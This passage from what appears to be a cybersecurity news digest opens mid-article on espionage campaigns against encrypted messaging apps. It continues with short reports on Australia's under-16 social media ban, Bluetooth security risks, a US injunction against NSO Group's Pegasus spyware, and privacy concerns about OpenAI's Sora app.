High-ranking government functionaries, diplomats, military advisors, investigative journalists, and leaders of civil society organizations across the United States, Europe, the Middle East, and parts of Asia have found themselves increasingly within the crosshairs of these clandestine campaigns.
 
The intent, investigators say, is rarely broad data collection. Rather, the aim is account takeover, message interception, and long-term device persistence that lays the groundwork for deeper espionage efforts.
 

How Attackers Are Breaching Encrypted Platforms

 
At the center of these intrusions is a shift in methodology: instead of attempting to crack sophisticated encryption, threat actors compromise the applications and operating systems that enable it. Across multiple investigations, researchers have uncovered operations that rely on:
 
1. Exploiting Trusted Features
 
Russia-aligned operators have repeatedly abused the device-linking capabilities of messaging platforms, persuading victims—via social engineering—to scan malicious connection requests. This enables a stealthy secondary device to be linked to a target’s account, giving attackers real-time access without altering the encryption layer itself.
 
2. Deploying Zero-Interaction Exploits
 
Several campaigns emerged this year in which attackers weaponized vulnerabilities that required no user action at all. Specially crafted media files sent via messaging apps, or exploit chains triggered upon receipt, allowed silent compromise of devices, particularly on Android models widely used in conflict-prone regions.
 
3. Distributing Counterfeit Applications
 
Clone apps impersonating popular platforms have proliferated across unofficial channels, especially in parts of the Middle East and South Asia. These imitations often mimic user interfaces with uncanny accuracy while embedding spyware capable of harvesting chats, recordings, contact lists, and stored files.
 
4. Leveraging Commercial Spyware and “Cyber-For-Hire” Tools
 
Commercial surveillance products, traditionally marketed to law enforcement or intelligence agencies, continue to spill into the underground economy. Once deployed, these tools often serve as an entry point for further exploitation, allowing attackers to drop additional payloads, manipulate settings, or modify authentication tokens.
 

Why Encrypted Platforms Are Under Unprecedented Attack

 
Analysts suggest that encrypted applications have become the new battleground for geopolitical intelligence. Their rising adoption by policymakers, activists, and diplomats has elevated them from personal communication tools to repositories of sensitive, sometimes world-shaping information.
 
Because the cryptographic foundations remain resilient, adversaries have pivoted toward undermining the assumptions around secure communication—namely, that the device you hold in your hand is trustworthy. In reality, attackers are increasingly proving that even the strongest encryption is powerless if the endpoint is already compromised.
  
Across the world, governments are imposing stricter regulations on spyware vendors and reassessing the presence of encrypted apps on official devices. Several legislative bodies have either limited or outright banned certain messaging platforms in response to the increasing frequency of targeted exploits.
 
Experts warn that the rise of commercialized cyber-operations, where tools once reserved for state intelligence now circulate endlessly between contractors, mercenaries, and hostile groups, signals a long-term shift in digital espionage strategy rather than a temporary spike.
 

What High-Risk Users Must Do

 
Security specialists emphasize that individuals operating in sensitive fields cannot rely on everyday digital hygiene alone. Enhanced practices, such as hardware isolation, phishing-resistant authentication, rigid permission control, and using only trusted app repositories, are rapidly becoming baseline requirements.
 
Some also recommend adopting hardened device modes, performing frequent integrity checks, and treating unexpected prompts (including QR-code requests) as potential attack vectors.

Australia Bans Under-16s from Social Media Starting December

 

Australia is introducing a world-first ban blocking under-16s from most major social media platforms, and Meta has begun shutting down or freezing teen accounts in advance of the law taking effect. 

From 10 December, Australians under 16 will be barred from using platforms including Instagram, Facebook, Threads, TikTok, YouTube, X, Reddit, Snapchat and others, with services facing fines up to A$50m if they do not take “reasonable steps” to keep underage users out. Prime Minister Anthony Albanese has called the measure “world-leading”, arguing it will protect children from online pressure, unwanted contact and other risks. 

Meta’s account shutdown plan

Meta has started messaging users it believes are 13–15 years old, telling them their Instagram, Facebook and Threads accounts will be deactivated from 4 December and that no new under-16 accounts can be created from that date.Affected teens are being urged to update contact details so they can be notified when eligible to rejoin and are given options to download and save their photos, videos and messages before deactivation. 

Teens who say they are old enough to stay on the platforms can challenge Meta’s decision by submitting a “video selfie” for facial age estimation or uploading a driving licence or other government ID. These and other age-assurance tools were recently tested for the government by the Australian Childrens’ eSafety provider, which concluded that no single foolproof solution exists and that each method has trade-offs.

Enforcement, concerns and workarounds

Australia’s e-Safety Commissioner says the goal is to shield teens from harm while online, but platforms warn tech-savvy young people may try to circumvent restrictions and argue instead for laws requiring parental consent for under-16s. In a related move, Roblox has said it will block under-16s from chatting with unknown adults and will introduce mandatory age verification for chat in Australia, New Zealand and the Netherlands from December before expanding globally. 

The e-Safety regulator has listed the services subject to the ban: Facebook, Instagram, Kick, Reddit, Snapchat, Threads, TikTok, X and YouTube. Exempt services include Discord, GitHub, Google Classroom, Lego Play, Messenger, Roblox, Steam and Steam Chat, WhatsApp and YouTube Kids, which are viewed as either educational, messaging-focused or more controlled environments for younger users.

Bluetooth Security Risks: Why Leaving It On Could Endanger Your Data

 

Bluetooth technology, widely used for wireless connections across smartphones, computers, health monitors, and peripherals, offers convenience but carries notable security risks—especially when left enabled at all times. While Bluetooth security and encryption have advanced over decades, the protocol remains exposed to various cyber threats, and many users neglect these vulnerabilities, putting personal data at risk.

Common Bluetooth security threats

Leaving Bluetooth permanently on is among the most frequent cybersecurity oversights. Doing so effectively announces your device’s continuous availability to connect, making it a target for attackers. 

Threat actors exploit Bluetooth through methods like bluesnarfing—the unauthorized extraction of data—and bluejacking, where unsolicited messages and advertisements are sent without consent. If hackers connect, they may siphon valuable information such as banking details, contact logs, and passwords, which can subsequently be used for identity theft, fraudulent purchases, or impersonation.

A critical issue is that data theft via Bluetooth is often invisible—victims receive no notification or warning. Further compounding the problem, Bluetooth signals can be leveraged for physical tracking. Retailers, for instance, commonly use Bluetooth beacons to trace shopper locations and gather granular behavioral data, raising privacy concerns.

Importantly, Bluetooth-related vulnerabilities affect more than just smartphones; they extend to health devices and wearables. Although compromising medical Bluetooth devices such as pacemakers or infusion pumps is technically challenging, targeted attacks remain a possibility for motivated adversaries.

Defensive strategies 

Mitigating Bluetooth risks starts with turning off Bluetooth in public or unfamiliar environments and disabling automatic reconnection features when constant use (e.g., wireless headphones) isn’t essential. Additionally, set devices to ‘undiscoverable’ mode as a default, blocking unexpected or unauthorized connections.

Regularly updating operating systems is vital, since outdated devices are prone to exploits like BlueBorne—a severe vulnerability allowing attackers full control over devices, including access to apps and cameras. Always reject unexpected Bluetooth pairing requests and periodically review app permissions, as many apps may exploit Bluetooth to track locations or obtain contact data covertly. 

Utilizing a Virtual Private Network (VPN) enhances overall security by encrypting network activity and masking IP addresses, though this measure isn’t foolproof. Ultimately, while Bluetooth offers convenience, mindful management of its settings is crucial for defending against the spectrum of privacy and security threats posed by wireless connectivity.

US Judge Permanently Bans NSO Group from Targeting WhatsApp Users

 

A U.S. federal judge has issued a permanent injunction barring Israeli spyware maker NSO Group from targeting WhatsApp users with its notorious Pegasus spyware, marking a landmark victory for Meta following years of litigation. 

The decision, handed down by Judge Phyllis J. Hamilton in the Northern District of California, concludes a legal battle that began in 2019, when Meta (the parent company of WhatsApp) sued NSO after discovering that about 1,400 users—including journalists, human rights activists, lawyers, political dissidents, diplomats, and government officials—had been surreptitiously targeted through “zero-click” Pegasus exploits.

The court found that NSO had reverse-engineered WhatsApp’s code and repeatedly updated its spyware to evade detection and security fixes, causing what the judge described as “irreparable harm” and undermining WhatsApp’s core promise of privacy and end-to-end encryption. The injunction prohibits NSO not only from targeting WhatsApp users but also from accessing or assisting others in accessing WhatsApp’s infrastructure, and further requires NSO to erase any data gathered from targeted users.

This victory for Meta was significant, but the court also reduced the previously awarded damages from $168 million to just $4 million, finding the original punitive sum excessive despite NSO’s egregious conduct. Nevertheless, the ruling sets a precedent for how U.S. tech companies can use the courts to combat mercenary spyware operations and commercial surveillance firms that compromise user privacy.

NSO Group argued that the permanent ban could “drive the company out of business,” pointing out that Pegasus is its flagship product used by governments ostensibly for fighting crime and terrorism. An NSO spokesperson claimed the ruling would not impact existing government customers, but Meta and digital rights advocates insist this bans NSO from ever targeting WhatsApp and holds them accountable for civil society surveillance.

The case highlights the ongoing tension between tech giants and commercial spyware vendors and signals a new willingness by courts to intervene to protect user privacy against advanced cyber-surveillance tools.

OpenAI's Sora App Raises Facial Data Privacy Concerns

 

OpenAI's video-generating app, Sora, has raised significant questions regarding the safety and privacy of user's biometric data, particularly with its "Cameo" feature that creates realistic AI videos, or "deepfakes," using a person's face and voice. 

To power this functionality, OpenAI confirms it must store users' facial and audio data. The company states this sensitive data is encrypted during both storage and transmission, and uploaded cameo data is automatically deleted after 30 days. Despite these assurances, privacy concerns remain. The app's ability to generate hyper-realistic videos has sparked fears about the potential for misuse, such as the creation of unauthorized deepfakes or the spread of misinformation. 

OpenAI acknowledges a slight risk that the app could produce inappropriate content, including sexual deepfakes, despite the safeguards in place. In response to these risks, the company has implemented measures to distinguish AI-generated content, including visible watermarks and invisible C2PA metadata in every video created with Sora .

The company emphasizes that users have control over their likeness. Individuals can decide who is permitted to use their cameo and can revoke access or delete any video featuring them at any time. However, a major point of contention is the app's account deletion policy. Deleting a Sora account also results in the termination of the user's entire OpenAI account, including ChatGPT access, and the user cannot register again with the same email or phone number. 

While OpenAI has stated it is developing a way for users to delete their Sora account independently, this integrated deletion policy has surprised and concerned many users who wish to remove their biometric data from Sora without losing access to other OpenAI services.

The app has also drawn attention for potential copyright violations, with users creating videos featuring well-known characters from popular media. While OpenAI provides a mechanism for rights holders to request the removal of their content, the platform's design has positioned it as a new frontier for intellectual property disputes.